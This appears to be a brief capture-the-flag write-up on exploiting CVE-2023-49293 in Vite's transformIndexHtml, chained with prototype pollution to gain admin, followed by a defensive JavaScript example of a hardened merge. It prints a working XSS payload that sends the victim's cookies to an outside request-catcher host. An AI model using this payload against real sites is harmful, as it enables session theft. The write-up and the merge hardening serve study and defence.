CVE-2023-49293

template = await vite.transformIndexHtml(url, template); is vulnerable and can be used to trigger XSS.

First use merge to trigger prototype pollution and obtain the admin identity, then write an article for the bot to visit, carrying the CVE payload:
url?"></script><script>window.location.href=`https://dionysus.requestcatcher.com/${btoa(document.cookie)}`</script>
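
For the merge step above, an added example (not the challenge's code) showing why a naive recursive merge pollutes `Object.prototype` and how a hardened merge prevents it. The function names, the `isAdmin` field and the request body are assumptions constructed for illustration.

```javascript
// Added example: naive vs. hardened recursive merge (all names hypothetical).
const BLOCKED_KEYS = new Set(['__proto__', 'constructor', 'prototype']);

const isPlainObject = (v) =>
  v !== null && typeof v === 'object' && !Array.isArray(v);

// Naive merge: recurses into "__proto__", so writes land on Object.prototype.
function naiveMerge(target, source) {
  for (const key in source) {
    if (isPlainObject(source[key]) && isPlainObject(target[key])) {
      naiveMerge(target[key], source[key]);
    } else {
      target[key] = source[key];
    }
  }
  return target;
}

// Hardened merge: own keys only, dangerous keys skipped, and it never
// descends into a value inherited from the prototype chain.
function safeMerge(target, source) {
  for (const key of Object.keys(source)) {
    if (BLOCKED_KEYS.has(key)) continue;
    const value = source[key];
    if (isPlainObject(value)) {
      const own = Object.prototype.hasOwnProperty.call(target, key)
        ? target[key]
        : undefined;
      target[key] = safeMerge(isPlainObject(own) ? own : {}, value);
    } else {
      target[key] = value;
    }
  }
  return target;
}

// Returns true if merging the constructed body made an unrelated object
// appear to be admin. Cleans up Object.prototype before returning.
function pollutesPrototype(merge) {
  // Constructed request body; JSON.parse creates an own "__proto__" key.
  const body = JSON.parse('{"name":"guest","__proto__":{"isAdmin":true}}');
  merge({}, body);
  const unrelatedSession = {};
  const polluted = unrelatedSession.isAdmin === true;
  delete Object.prototype.isAdmin;
  return polluted;
}

console.log('naive merge pollutes:', pollutesPrototype(naiveMerge));
console.log('safe merge pollutes:', pollutesPrototype(safeMerge));
```

Authorization checks should also read flags as own properties (for example with `Object.prototype.hasOwnProperty.call`) so an inherited value is never trusted.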